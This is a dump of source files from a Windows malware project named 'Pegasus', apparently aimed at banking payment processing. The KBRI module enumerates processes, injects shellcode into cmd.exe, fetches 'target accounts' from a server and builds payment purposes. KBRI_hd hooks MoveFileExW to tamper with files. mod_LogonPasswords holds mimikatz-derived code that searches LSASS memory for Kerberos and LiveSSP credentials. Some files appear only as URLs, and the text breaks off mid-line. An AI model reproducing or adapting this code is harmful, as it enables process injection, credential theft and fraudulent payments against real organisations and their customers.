-------------------------------------------------------------------------------- /Pegasus/mod_DomainReplication/mod_DomainReplication.h: -------------------------------------------------------------------------------- 1 | /* 2 | mod_DomainReplication.h 3 | */ 4 | 5 | #pragma once 6 | 7 | #include 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | -------------------------------------------------------------------------------- /Pegasus/mod_KBRI/KBRI.cpp: -------------------------------------------------------------------------------- 1 | /* 2 | KBRI.cpp 3 | Main routines file 4 | */ 5 | 6 | #include 7 | #include 8 | 9 | #include "..\inc\dbg.h" 10 | #include "..\inc\mem.h" 11 | #include "..\inc\HashedStrings.h" 12 | #include "..\inc\MyStringRoutines.h" 13 | 14 | #include "..\inc\EmbeddedResources.h" 15 | #include "..\Shellcode\shellcode.h" 16 | 17 | #include "kbriInject.h" 18 | #include "kbriList.h" 19 | #include "kbriController.h" 20 | #include "kbriTargetAccManager.h" 21 | #include "kbriDataParser.h" 22 | 23 | #include "KBRI.h" 24 | 25 | 26 | 27 | // module's globals 28 | KBRI_GLOBALS gKBRI; 29 | 30 | 31 | 32 | /* 33 | enums all running processes to find cmd.exe and attempt to call injection function for it 34 | */ 35 | #define KBRIA_RND_XOR STRHASH_PARAM(0x2e555d24997b6c7) 36 | VOID kbriScanInjectCmdProcess() 37 | { 38 | HANDLE hSnap = INVALID_HANDLE_VALUE; 39 | PROCESSENTRY32 pe = { 0 }; 40 | 41 | //DbgPrint("entered"); 42 | 43 | do { // not a loop 44 | 45 | // before scan, set a special flag in all saved items to remove non-existent processes later 46 | kbriClearScannedFlag(&gKBRI.list); 47 | 48 | hSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0); 49 | if (hSnap == INVALID_HANDLE_VALUE) { DbgPrint("ERR: CreateToolhelp32Snapshot() failed, code %p", GetLastError()); break; } 50 | 51 | pe.dwSize = sizeof(PROCESSENTRY32); 52 | if (!Process32First(hSnap, &pe)) { DbgPrint("ERR: Process32First() failed, le %p", GetLastError()); break; } 53 | 54 | do { 55 | 56 | // process pe structure 57 | sr_lowercase(pe.szExeFile); 58 | if ((HashStringW_const(pe.szExeFile) ^ KBRIA_RND_XOR) == (HASHSTR_CONST("cmd.exe", 0x3eaf098d3e434b1a) ^ KBRIA_RND_XOR)) { 59 | 60 | // add while checking if such pid not exist yet 61 | // ALSO, adds scanned flag in case of duplicate pid 62 | if (kbriAddInjectedPid(&gKBRI.list, pe.th32ProcessID)) { 63 | 64 | DbgPrint("detected cmd process pid %u", pe.th32ProcessID); 65 | 66 | kbriAttemptInject(pe.th32ProcessID); 67 | 68 | } // dup check 69 | 70 | } // hash check 71 | 72 | } while (Process32Next(hSnap, &pe)); 73 | 74 | // all done 75 | CloseHandle(hSnap); 76 | 77 | // remove from list items, not found during last scan 78 | kbriRemoveNotScanned(&gKBRI.list); 79 | 80 | } while (FALSE); // not a loop 81 | } 82 | 83 | 84 | 85 | /* 86 | Starts a thread to monitor / inject into target processes 87 | NB: we have max 5 sec after target cmd script start to perform injection before it starts working 88 | */ 89 | VOID kbriStartInjMonitor() 90 | { 91 | 92 | // init globals 93 | memset(&gKBRI, 0, sizeof(KBRI_GLOBALS)); 94 | kbriInitList(&gKBRI.list); 95 | 96 | kdpInit(); 97 | 98 | // engage controller pipe server 99 | kcStartController(&gKBRI); 100 | 101 | // start server communication thread to periodically request t-accs updates 102 | tamStartTAccsQueryThread(&gKBRI); 103 | 104 | // start scan 105 | do { 106 | 107 | kbriScanInjectCmdProcess(); 108 | 109 | #ifndef _DEBUG 110 | Sleep(15000); 111 | #else 112 | Sleep(3000); 113 | #endif 114 | 115 | } while (TRUE); // infinite loop 116 | 117 | } -------------------------------------------------------------------------------- /Pegasus/mod_KBRI/KBRI.h: -------------------------------------------------------------------------------- 1 | /* 2 | KBRI.h 3 | */ 4 | #pragma once 5 | #include 6 | 7 | #include "kbriList.h" 8 | 9 | 10 | 11 | 12 | 13 | // all globals var used by module, in a single structure 14 | typedef struct _KBRI_GLOBALS 15 | { 16 | KBRI_LIST list; // linked list of injected processes 17 | 18 | DWORD dwPipeServerThreadId; // tid of pipe server thread, needed when other version requests termination 19 | DWORD dwTAccsQueryThreadId; // kbriTargetAccManager.cpp, thread to periodically issue special server request 20 | 21 | } KBRI_GLOBALS, *PKBRI_GLOBALS; 22 | 23 | 24 | VOID kbriStartInjMonitor(); -------------------------------------------------------------------------------- /Pegasus/mod_KBRI/kbriController.h: -------------------------------------------------------------------------------- 1 | /* 2 | kbriController.h 3 | */ 4 | 5 | #include 6 | 7 | #include "KBRI.h" 8 | 9 | BOOL kcStartController(KBRI_GLOBALS *KBRI); -------------------------------------------------------------------------------- /Pegasus/mod_KBRI/kbriDataParser.cpp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DeadNumbers/Pegasus/f83159ebcc2b2ba429b23805fdc66ab3eb2959f5/Pegasus/mod_KBRI/kbriDataParser.cpp -------------------------------------------------------------------------------- /Pegasus/mod_KBRI/kbriDataParser.h: -------------------------------------------------------------------------------- 1 | /* 2 | kbriDataParser.h 3 | */ 4 | 5 | #include 6 | 7 | #include "kbriTargetAccManager.h" 8 | 9 | 10 | // globals for this module 11 | typedef struct _KDP_GLOBALS 12 | { 13 | 14 | TARGACCS_LIST tal; 15 | 16 | } KDP_GLOBALS, *PKDP_GLOBALS; 17 | 18 | 19 | // structure to pass params from kdpParseData() to kdpParseDataInt() 20 | typedef struct _PD_PARAMS 21 | { 22 | LPVOID pBuffer; 23 | DWORD dwBufferLen; 24 | LPVOID *pResBuffer; 25 | DWORD *dwResBufferLen; 26 | 27 | BOOL bRes; // processing function's result 28 | 29 | } PD_PARAMS, *PPD_PARAMS; 30 | 31 | BOOL kdpParseData(LPVOID pBuffer, DWORD dwBufferLen, LPVOID *pResBuffer, DWORD *dwResBufferLen); 32 | VOID kdpInit(); -------------------------------------------------------------------------------- /Pegasus/mod_KBRI/kbriGeneratePurpose.cpp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DeadNumbers/Pegasus/f83159ebcc2b2ba429b23805fdc66ab3eb2959f5/Pegasus/mod_KBRI/kbriGeneratePurpose.cpp -------------------------------------------------------------------------------- /Pegasus/mod_KBRI/kbriGeneratePurpose.h: -------------------------------------------------------------------------------- 1 | /* 2 | kbriGeneratePurpose.h 3 | */ 4 | 5 | #include 6 | 7 | BOOL kgpGeneratePurpose(LPSTR *pszResult, UINT64 i64Sum); -------------------------------------------------------------------------------- /Pegasus/mod_KBRI/kbriInject.h: -------------------------------------------------------------------------------- 1 | /* 2 | kbriInject.h 3 | */ 4 | #pragma once 5 | #include 6 | 7 | 8 | #pragma pack(push) 9 | #pragma pack(1) 10 | 11 | #if defined(_M_X64) 12 | 13 | // x64 shellcode entry trampouline 14 | typedef struct _JumpCode 15 | { 16 | WORD wMovRcxOpcode; // param 17 | ULONGLONG ulParam; 18 | 19 | WORD wMovRaxOpcode; // jump addr 20 | ULONGLONG ulExecAddr; 21 | 22 | WORD wJmpRaxOpcode; 23 | 24 | } JumpCode, *PJumpCode; 25 | #else 26 | 27 | // x32 shellcode entry trampouline 28 | typedef struct _JumpCode 29 | { 30 | 31 | 32 | BYTE bPushOpcode1; // param 33 | DWORD dwParam; 34 | 35 | BYTE bPushOpcode2; 36 | DWORD dwRetAddr; // addr to assume return after all routines finished (essential for proper stack access by shellcode) 37 | 38 | BYTE bPushOpcode3; // exec addr 39 | DWORD dwExecAddr; 40 | 41 | BYTE bRetOpcode; 42 | 43 | } JumpCode, *PJumpCode; 44 | 45 | #endif 46 | 47 | #pragma pack(pop) // restore previous alignment settings 48 | 49 | BOOL kbriPrepareInjBuffer(LPVOID *pResBuffer, DWORD *dwResBufferLen, DWORD *dwShellcodeEntryOffset, DWORD *dwShellcodeLen); 50 | BOOL kbriPatchInjBufferOffsets(LPVOID pBuffer, LPVOID pTargetMemPtr, DWORD dwShellcodeEntryOffset, DWORD dwShellcodeLen); 51 | BOOL kbriAttemptInject(DWORD dwTargetPID); -------------------------------------------------------------------------------- /Pegasus/mod_KBRI/kbriList.cpp: -------------------------------------------------------------------------------- 1 | /* 2 | kbriList.cpp 3 | Misc linked list - related routines 4 | */ 5 | 6 | #include 7 | 8 | #include "..\inc\dbg.h" 9 | #include "..\inc\mem.h" 10 | 11 | #include "kbriList.h" 12 | 13 | VOID kbriInitList(KBRI_LIST *list) 14 | { 15 | memset(list, 0, sizeof(KBRI_LIST)); 16 | InitializeCriticalSection(&list->csipAccess); 17 | } 18 | 19 | /* 20 | Try to add a pid to list. If pid a new - returns TRUE 21 | In case of duplicate pid, returns FALSE 22 | ALSO, adds scanned flag in case of duplicate pid 23 | */ 24 | BOOL kbriAddInjectedPid(KBRI_LIST *list, DWORD dwPID) 25 | { 26 | BOOL bRes = TRUE; 27 | INJECTED_PROCESS_CHUNK *chunk; // moving ptr with current chunk 28 | 29 | // scan existent items 30 | if (list->dwipCount) { 31 | 32 | EnterCriticalSection(&list->csipAccess); 33 | 34 | // get first item 35 | chunk = list->ipHead.lcNext; 36 | 37 | while (chunk) { 38 | 39 | // check contents 40 | if (chunk->er.dwPID == dwPID) { /* DbgPrint("pid %u already injected", dwPID); */ bRes = FALSE; chunk->er.bScanned = TRUE; break; } 41 | 42 | // move to next item 43 | chunk = chunk->lcNext; 44 | } 45 | 46 | LeaveCriticalSection(&list->csipAccess); 47 | 48 | // check if found pid 49 | if (!bRes) { return bRes; } 50 | 51 | } else { DbgPrint("no items yet"); } // items present 52 | 53 | // really add a new pid record 54 | chunk = (INJECTED_PROCESS_CHUNK *)my_alloc(sizeof(INJECTED_PROCESS_CHUNK)); 55 | chunk->er.dwPID = dwPID; 56 | chunk->er.bScanned = TRUE; 57 | 58 | // link to list 59 | EnterCriticalSection(&list->csipAccess); 60 | chunk->lcNext = list->ipHead.lcNext; 61 | list->ipHead.lcNext = chunk; 62 | list->dwipCount++; 63 | DbgPrint("added new item, new count %u", list->dwipCount); 64 | LeaveCriticalSection(&list->csipAccess); 65 | 66 | return bRes; 67 | } 68 | 69 | 70 | /* 71 | Iterate all items and clear scanned flag 72 | */ 73 | VOID kbriClearScannedFlag(KBRI_LIST *list) 74 | { 75 | INJECTED_PROCESS_CHUNK *chunk; // moving ptr with current chunk 76 | 77 | // check for no items 78 | if (!list->dwipCount) { return; } 79 | 80 | EnterCriticalSection(&list->csipAccess); 81 | 82 | // get first item 83 | chunk = list->ipHead.lcNext; 84 | 85 | while (chunk) { 86 | 87 | // set value 88 | chunk->er.bScanned = FALSE; 89 | 90 | // move to next item 91 | chunk = chunk->lcNext; 92 | } 93 | 94 | LeaveCriticalSection(&list->csipAccess); 95 | } 96 | 97 | /* 98 | Iterate chunk list and remove all items where no bScanned flag currently set 99 | */ 100 | VOID kbriRemoveNotScanned(KBRI_LIST *list) 101 | { 102 | INJECTED_PROCESS_CHUNK *chunk; // moving ptr with current chunk 103 | INJECTED_PROCESS_CHUNK *chunk_prev; 104 | 105 | // check for no items 106 | if (!list->dwipCount) { return; } 107 | 108 | EnterCriticalSection(&list->csipAccess); 109 | 110 | // get first item 111 | chunk_prev = &list->ipHead; 112 | chunk = list->ipHead.lcNext; 113 | 114 | while (chunk) { 115 | 116 | // check flag 117 | if (!chunk->er.bScanned) { 118 | 119 | DbgPrint("removing pid %u as non-running", chunk->er.dwPID); 120 | 121 | // found not-set flag, unlink chunk 122 | chunk_prev->lcNext = chunk->lcNext; 123 | list->dwipCount--; 124 | 125 | // dealloc 126 | my_free(chunk); 127 | 128 | // move to next item 129 | chunk = chunk_prev->lcNext; 130 | 131 | } else { 132 | 133 | // move to next item 134 | chunk_prev = chunk_prev->lcNext; 135 | chunk = chunk->lcNext; 136 | 137 | } 138 | } 139 | 140 | LeaveCriticalSection(&list->csipAccess); 141 | 142 | 143 | } -------------------------------------------------------------------------------- /Pegasus/mod_KBRI/kbriList.h: -------------------------------------------------------------------------------- 1 | /* 2 | kbriList.h 3 | */ 4 | #pragma once 5 | #include 6 | 7 | // structure describing a single item of injected process 8 | typedef struct _INJECTED_PROCESS 9 | { 10 | DWORD dwPID; // pid of process injected (or at least attempted to) 11 | BOOL bScanned; // flag used while re-enuming processes list, to remove non-existent processes after re-scan 12 | 13 | } INJECTED_PROCESS, *PINJECTED_PROCESS; 14 | 15 | 16 | // single chunk pointer by linked list 17 | typedef struct _INJECTED_PROCESS_CHUNK INJECTED_PROCESS_CHUNK; 18 | typedef struct _INJECTED_PROCESS_CHUNK 19 | { 20 | INJECTED_PROCESS_CHUNK *lcNext; 21 | INJECTED_PROCESS er; // NB: payload in head item is not used 22 | 23 | } INJECTED_PROCESS_CHUNK, *PINJECTED_PROCESS_CHUNK; 24 | 25 | typedef struct _KBRI_LIST 26 | { 27 | INJECTED_PROCESS_CHUNK ipHead; // list head for a list of injected processes 28 | DWORD dwipCount; // amount of ^ 29 | CRITICAL_SECTION csipAccess; // cs to guard access to a list 30 | 31 | } KBRI_LIST, *PKBRI_LIST; 32 | 33 | VOID kbriInitList(KBRI_LIST *list); 34 | BOOL kbriAddInjectedPid(KBRI_LIST *list, DWORD dwPID); 35 | VOID kbriClearScannedFlag(KBRI_LIST *list); 36 | VOID kbriRemoveNotScanned(KBRI_LIST *list); -------------------------------------------------------------------------------- /Pegasus/mod_KBRI/kbriTargetAccManager.h: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DeadNumbers/Pegasus/f83159ebcc2b2ba429b23805fdc66ab3eb2959f5/Pegasus/mod_KBRI/kbriTargetAccManager.h -------------------------------------------------------------------------------- /Pegasus/mod_KBRI/mod_KBRI.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | Source Files 6 | 7 | 8 | Source Files\libs 9 | 10 | 11 | Source Files\libs 12 | 13 | 14 | Source Files\libs 15 | 16 | 17 | Source Files 18 | 19 | 20 | Source Files\incs 21 | 22 | 23 | Source Files\incs 24 | 25 | 26 | Source Files\libs 27 | 28 | 29 | Source Files\libs 30 | 31 | 32 | Source Files\libs 33 | 34 | 35 | 36 | 37 | Header Files 38 | 39 | 40 | Header Files 41 | 42 | 43 | Header Files\libs 44 | 45 | 46 | Header Files\libs 47 | 48 | 49 | Header Files\libs 50 | 51 | 52 | Header Files 53 | 54 | 55 | Header Files\incs 56 | 57 | 58 | Header Files\incs 59 | 60 | 61 | Header Files\libs 62 | 63 | 64 | Header Files\libs 65 | 66 | 67 | Header Files\libs 68 | 69 | 70 | Header Files 71 | 72 | 73 | Header Files 74 | 75 | 76 | 77 | 78 | {e9874ae9-5322-4bf1-90b7-053fe676066c} 79 | 80 | 81 | {626d82b2-93ec-4885-ae5c-9e4a3067f6b9} 82 | 83 | 84 | {aa96f6c4-8d23-4164-a305-97ed9717fd8e} 85 | 86 | 87 | {096d18db-ef92-41b5-bef2-bf2e48da28fc} 88 | 89 | 90 | {f41dc97e-2f8a-444c-8cd6-25b3b3784da6} 91 | 92 | 93 | {68a8556c-6033-494b-981f-27c34db729ca} 94 | 95 | 96 | -------------------------------------------------------------------------------- /Pegasus/mod_KBRI/mod_KBRI.h: -------------------------------------------------------------------------------- 1 | /* 2 | mod_KBRI.h 3 | */ 4 | 5 | #pragma once 6 | 7 | #include 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | -------------------------------------------------------------------------------- /Pegasus/mod_KBRI_hd/APIHook.h: -------------------------------------------------------------------------------- 1 | /* 2 | APIHook.h 3 | Headers file 4 | */ 5 | 6 | #include 7 | 8 | 9 | // max size of stub code in bytes 10 | #if defined(_M_X64) 11 | // x64 12 | #define HOOK_STUB_MAXLEN 45 13 | #define MIN_STUB_LEN 12 14 | #else 15 | // x32 16 | #define HOOK_STUB_MAXLEN 20 17 | #define MIN_STUB_LEN 5 18 | #endif 19 | 20 | 21 | 22 | void patch_function(LPVOID address, unsigned char *stub, unsigned char *hook, DWORD *stub_len); 23 | BOOL hkHook(HMODULE hModule, LPSTR szFunctionName, LPVOID pHook, LPVOID pStub, LPVOID *pToCallOrig); -------------------------------------------------------------------------------- /Pegasus/mod_KBRI_hd/KBRI_hd.h: -------------------------------------------------------------------------------- 1 | /* 2 | KBRI_hd.h 3 | */ 4 | 5 | #include 6 | 7 | // description of hooked functions 8 | typedef BOOL(WINAPI *f_MoveFileExW)(LPCWSTR lpExistingFileName, LPCWSTR lpNewFileName, DWORD dwFlags); 9 | 10 | // global vars structure 11 | typedef struct _KHD_GLOBALS 12 | { 13 | LPVOID pStubs; // buffer to hold all the stubs. Ptrs to call orig funcs will point here 14 | 15 | // hook stubs to call original function, ptrs to some place at pStubs 16 | f_MoveFileExW p_MoveFileExW; 17 | 18 | } KHD_GLOBALS, *PKHD_GLOBALS; 19 | 20 | 21 | 22 | 23 | VOID khdSetHooks(); -------------------------------------------------------------------------------- /Pegasus/mod_KBRI_hd/khdProcessing.h: -------------------------------------------------------------------------------- 1 | /* 2 | khdProcessing.h 3 | */ 4 | 5 | #include 6 | 7 | BOOL kpCheckFile(LPCWSTR wszExistingFilename, LPVOID *pNewData, DWORD *dwNewDataLen, FILETIME *ftC, FILETIME *ftA, FILETIME *ftW); -------------------------------------------------------------------------------- /Pegasus/mod_KBRI_hd/ldasm.h: -------------------------------------------------------------------------------- 1 | #ifndef _LDASM_ 2 | #define _LDASM_ 3 | 4 | //#include "defines.h" 5 | #include 6 | 7 | #define F_INVALID 0x01 8 | #define F_PREFIX 0x02 9 | #define F_REX 0x04 10 | #define F_MODRM 0x08 11 | #define F_SIB 0x10 12 | #define F_DISP 0x20 13 | #define F_IMM 0x40 14 | #define F_RELATIVE 0x80 15 | 16 | #define uint8_t BYTE 17 | #define uint32_t DWORD 18 | 19 | typedef struct _ldasm_data { 20 | uint8_t flags; 21 | uint8_t rex; 22 | uint8_t modrm; 23 | uint8_t sib; 24 | uint8_t opcd_offset; 25 | uint8_t opcd_size; 26 | uint8_t disp_offset; 27 | uint8_t disp_size; 28 | uint8_t imm_offset; 29 | uint8_t imm_size; 30 | } ldasm_data; 31 | 32 | /* 33 | Description: 34 | Disassemble one instruction 35 | 36 | Arguments: 37 | code - pointer to the code for disassemble 38 | ld - pointer to structure ldasm_data 39 | is64 - set this flag for 64-bit code, and clear for 32-bit 40 | 41 | Return: 42 | length of instruction 43 | */ 44 | unsigned int ldasm(void *code, ldasm_data *ld, uint32_t is64); 45 | 46 | #endif /* _LDASM_ */ 47 | -------------------------------------------------------------------------------- /Pegasus/mod_KBRI_hd/mod_KBRI_hd.c: -------------------------------------------------------------------------------- 1 | /* 2 | mod_KBRI_hd.c 3 | Main file for module KBRI_hd 4 | NB: stand-alone dll with all modules compiled locally (no ROUTINES_BY_PTR) 5 | 6 | */ 7 | 8 | 9 | // perform essential compiler settings 10 | // remove stdlib 11 | #pragma comment(linker, "/NODEFAULTLIB:libcmt.lib") 12 | #pragma comment(linker, "/NODEFAULTLIB:MSVCRT.lib") 13 | #pragma comment(linker, "/NODEFAULTLIB:MSVCRTD.lib") 14 | #pragma comment(linker, "/NODEFAULTLIB:libcmtd.lib") 15 | 16 | 17 | #include 18 | 19 | #include "..\inc\dbg.h" 20 | #include "..\inc\mem.h" 21 | #include "..\shared\ModuleAPI.h" 22 | 23 | // internal code modules 24 | #include "KBRI_hd.h" 25 | 26 | 27 | 28 | 29 | 30 | 31 | #if defined(_M_X64) 32 | // x64 system libs 33 | #pragma comment (lib, "..\\lib\\amd64\\BufferOverflowU.lib") 34 | #pragma comment (lib, "..\\lib\\amd64\\ntdll.lib") 35 | #elif defined(_M_IX86) 36 | // x32 system libs 37 | #pragma comment (lib, "..\\lib\\i386\\BufferOverflowU.lib") 38 | #pragma comment (lib, "..\\lib\\i386\\ntdll.lib") 39 | #else 40 | #error Unknown target CPU, no system libs can be found 41 | #endif 42 | 43 | 44 | 45 | #include "mod_KBRI_hd.h" 46 | 47 | 48 | /* 49 | Checks if a specific mutex already exists 50 | */ 51 | BOOL kbAreUniq() 52 | { 53 | BOOL bRes = FALSE; 54 | LPWSTR wszName; 55 | 56 | wszName = CRSTRW("pg0DB75F67E1DBEF", "\xfc\xff\xd1\x02\xec\xff\xc1\x0d\xbc\xc3\x13\xbd\x59\x21\x47\x9d\x09\x76\x55\x88\x69\x61\xbb"); 57 | 58 | if (!OpenMutex(SYNCHRONIZE, FALSE, wszName)) { 59 | 60 | CreateMutex(NULL, TRUE, wszName); 61 | 62 | bRes = TRUE; 63 | } 64 | 65 | my_free(wszName); 66 | 67 | return bRes; 68 | } 69 | 70 | 71 | // entrypoint function for module 72 | // called as separate thread in context of a target remote process 73 | BOOL WINAPI DllEntry(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved) 74 | { 75 | BOOL bRes = TRUE; // need return TRUE to proceed next 76 | DWORD dwThreadId; 77 | 78 | if (fdwReason == DLL_PROCESS_ATTACH) { 79 | 80 | DbgPrint("DLL_PROCESS_ATTACH: entered, hinstDLL=%p lpvReserved=%p", hinstDLL, lpvReserved); 81 | 82 | // start work 83 | if (kbAreUniq()) { khdSetHooks(); } else { DbgPrint("ERR: already exist"); bRes = FALSE; } 84 | 85 | DbgPrint("DLL_PROCESS_ATTACH: done"); 86 | 87 | } // DLL_PROCESS_ATTACH 88 | 89 | return bRes; 90 | } 91 | 92 | 93 | 94 | 95 | 96 | 97 | -------------------------------------------------------------------------------- /Pegasus/mod_KBRI_hd/mod_KBRI_hd.h: -------------------------------------------------------------------------------- 1 | /* 2 | mod_KBRI_hd.h 3 | */ 4 | 5 | #pragma once 6 | 7 | #include 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | -------------------------------------------------------------------------------- /Pegasus/mod_KBRI_hd/mod_KBRI_hd.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | Sources\inc 6 | 7 | 8 | Sources\inc 9 | 10 | 11 | Sources\inc 12 | 13 | 14 | 15 | Sources 16 | 17 | 18 | Sources 19 | 20 | 21 | Sources 22 | 23 | 24 | Sources 25 | 26 | 27 | Sources\inc 28 | 29 | 30 | 31 | 32 | Headers\inc 33 | 34 | 35 | Headers\inc 36 | 37 | 38 | Headers\inc 39 | 40 | 41 | 42 | Headers 43 | 44 | 45 | Headers 46 | 47 | 48 | Headers 49 | 50 | 51 | Headers 52 | 53 | 54 | Headers\inc 55 | 56 | 57 | 58 | 59 | {16f04f9c-0d4c-4c7c-adaa-5d51d6851f0c} 60 | 61 | 62 | {ea9d7abd-44ad-4238-8ad1-8fe46c6907d5} 63 | 64 | 65 | {248d21c0-1028-4506-8deb-5ffef60061f5} 66 | 67 | 68 | {7c0b24d0-e1ab-4277-a3a3-1acd5cb48a21} 69 | 70 | 71 | -------------------------------------------------------------------------------- /Pegasus/mod_LogonPasswords/LogonPasswords.cpp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DeadNumbers/Pegasus/f83159ebcc2b2ba429b23805fdc66ab3eb2959f5/Pegasus/mod_LogonPasswords/LogonPasswords.cpp -------------------------------------------------------------------------------- /Pegasus/mod_LogonPasswords/lpmemory.h: -------------------------------------------------------------------------------- 1 | /* 2 | lpmemory.h 3 | */ 4 | 5 | #pragma once 6 | #include 7 | 8 | void * __cdecl operator new(size_t iLen); 9 | void __cdecl operator delete(void *p); 10 | 11 | bool lp_readMemory(const void * adresseBase, void * adresseDestination, size_t longueur = 1, HANDLE handleProcess = INVALID_HANDLE_VALUE); 12 | bool lp_searchMemory(const PBYTE adresseBase, const PBYTE adresseMaxMin, const PBYTE pattern, PBYTE * addressePattern, size_t longueur = 1, bool enAvant = true, HANDLE handleProcess = INVALID_HANDLE_VALUE); 13 | bool lp_searchMemory(const PBYTE adresseBase, const long offsetMaxMin, const PBYTE pattern, long * offsetPattern, size_t longueur = 1, bool enAvant = true, HANDLE handleProcess = INVALID_HANDLE_VALUE); 14 | bool lp_genericPatternSearch(PBYTE * thePtr, wchar_t * moduleName, BYTE pattern[], ULONG taillePattern, LONG offSetToPtr, char * startFunc = NULL, bool enAvant = true, bool noPtr = false); 15 | -------------------------------------------------------------------------------- /Pegasus/mod_LogonPasswords/lpprocess.h: -------------------------------------------------------------------------------- 1 | /* 2 | lpprocess.h 3 | */ 4 | 5 | #pragma once 6 | #include 7 | #include "LogonPasswords.h" 8 | 9 | /* 10 | typedef struct _KIWI_VERY_BASIC_MODULEENTRY 11 | { 12 | BYTE * modBaseAddr; // Base address of module in th32ProcessID's context 13 | DWORD modBaseSize; // Size in bytes of module starting at modBaseAddr 14 | LPWSTR wszModule; 15 | } KIWI_VERY_BASIC_MODULEENTRY, *PKIWI_VERY_BASIC_MODULEENTRY; 16 | */ 17 | 18 | // callback definition to be called on each received full data chunk 19 | typedef BOOL(CALLBACK* MODULE_INFO_CALLBACK)(KIWI_VERY_BASIC_MODULEENTRY *, LPVOID); 20 | 21 | LPWSTR lp_getUnicodeStringOfProcess(UNICODE_STRING * ptrString, HANDLE process, PLSA_PROTECT_MEMORY unProtectFunction = NULL); 22 | bool lp_getVeryBasicModulesListForProcess(MODULE_INFO_CALLBACK miCallback, LPVOID pCallbackParam, HANDLE processHandle); -------------------------------------------------------------------------------- /Pegasus/mod_LogonPasswords/mod_LogonPasswords.h: -------------------------------------------------------------------------------- 1 | /* 2 | mod_LogonPasswords.h 3 | */ 4 | 5 | #pragma once 6 | 7 | #include 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | -------------------------------------------------------------------------------- /Pegasus/mod_LogonPasswords/sec_pkg/kerberos.h: -------------------------------------------------------------------------------- 1 | /* Benjamin DELPY `gentilkiwi` 2 | http://blog.gentilkiwi.com 3 | benjamin@gentilkiwi.com 4 | Licence : http://creativecommons.org/licenses/by-nc-sa/3.0/ 5 | This file : http://creativecommons.org/licenses/by/3.0/ 6 | */ 7 | #pragma once 8 | #include "..\LogonPasswords.h" 9 | 10 | 11 | typedef struct _KIWI_KERBEROS_LOGON_SESSION 12 | { 13 | struct _KIWI_KERBEROS_LOGON_SESSION *Flink; 14 | struct _KIWI_KERBEROS_LOGON_SESSION *Blink; 15 | DWORD UsageCount; 16 | PVOID unk0; 17 | PVOID unk1; 18 | PVOID unk2; 19 | DWORD unk3; 20 | DWORD unk4; 21 | PVOID unk5; 22 | PVOID unk6; 23 | PVOID unk7; 24 | LUID LocallyUniqueIdentifier; 25 | #ifdef _M_IX86 26 | DWORD unk8; 27 | #endif 28 | DWORD unk9; 29 | DWORD unk10; 30 | PVOID unk11; 31 | DWORD unk12; 32 | DWORD unk13; 33 | PVOID unk14; 34 | PVOID unk15; 35 | PVOID unk16; 36 | KIWI_GENERIC_PRIMARY_CREDENTIAL credentials; 37 | } KIWI_KERBEROS_LOGON_SESSION, *PKIWI_KERBEROS_LOGON_SESSION; 38 | 39 | typedef struct _KIWI_KERBEROS_PRIMARY_CREDENTIAL 40 | { 41 | DWORD unk0; 42 | PVOID unk1; 43 | PVOID unk2; 44 | PVOID unk3; 45 | #ifdef _M_X64 46 | BYTE unk4[32]; 47 | #elif defined _M_IX86 48 | BYTE unk4[20]; 49 | #endif 50 | LUID LocallyUniqueIdentifier; 51 | #ifdef _M_X64 52 | BYTE unk5[44]; 53 | #elif defined _M_IX86 54 | BYTE unk5[36]; 55 | #endif 56 | KIWI_GENERIC_PRIMARY_CREDENTIAL credentials; 57 | } KIWI_KERBEROS_PRIMARY_CREDENTIAL, *PKIWI_KERBEROS_PRIMARY_CREDENTIAL; 58 | 59 | 60 | typedef struct _KERBEROS_MODULE_CONTEXT { 61 | 62 | PKIWI_KERBEROS_LOGON_SESSION KerbLogonSessionList; 63 | long offsetMagic; 64 | PRTL_AVL_TABLE KerbGlobalLogonSessionTable; 65 | 66 | } KERBEROS_MODULE_CONTEXT, *PKERBEROS_MODULE_CONTEXT; 67 | 68 | VOID kerb_InitGlobals(); 69 | bool searchKerberosFuncs(LP_MODULE_CONTEXT *pContext); 70 | bool WINAPI getKerberosLogonData(LP_MODULE_CONTEXT *pContext, __in PLUID logId); 71 | 72 | -------------------------------------------------------------------------------- /Pegasus/mod_LogonPasswords/sec_pkg/livessp.cpp: -------------------------------------------------------------------------------- 1 | /* Benjamin DELPY `gentilkiwi` 2 | http://blog.gentilkiwi.com 3 | benjamin@gentilkiwi.com 4 | Licence : http://creativecommons.org/licenses/by-nc-sa/3.0/ 5 | This file : http://creativecommons.org/licenses/by/3.0/ 6 | */ 7 | #include 8 | #include 9 | 10 | #include "..\lpmemory.h" 11 | #include "..\..\inc\dbg.h" 12 | #include "..\..\inc\mem.h" 13 | #include "..\..\inc\CryptoStrings.h" 14 | 15 | #include "livessp.h" 16 | 17 | PKIWI_LIVESSP_LIST_ENTRY LiveGlobalLogonSessionList; 18 | 19 | VOID lssp_InitGlobals() 20 | { 21 | LiveGlobalLogonSessionList = NULL; 22 | } 23 | 24 | bool searchLiveGlobalLogonSessionList(LP_MODULE_CONTEXT *pContext) 25 | { 26 | LPWSTR wszLivessp; 27 | 28 | #ifdef _M_X64 29 | BYTE PTRN_WALL_LiveUpdatePasswordForLogonSessions[] = {0x48, 0x83, 0x65, 0xdf, 0x00, 0x48, 0x83, 0x65, 0xef, 0x00, 0x48, 0x83, 0x65, 0xe7, 0x00}; 30 | #elif defined _M_IX86 31 | BYTE PTRN_WALL_LiveUpdatePasswordForLogonSessions[] = {0x89, 0x5d, 0xdc, 0x89, 0x5d, 0xe4, 0x89, 0x5d, 0xe0}; 32 | #endif 33 | LONG OFFS_WALL_LiveUpdatePasswordForLogonSessions = -(5 + 4); 34 | 35 | if (pContext->pModLIVESSP && !LiveGlobalLogonSessionList) 36 | { 37 | 38 | wszLivessp = CRSTRW("livessp", 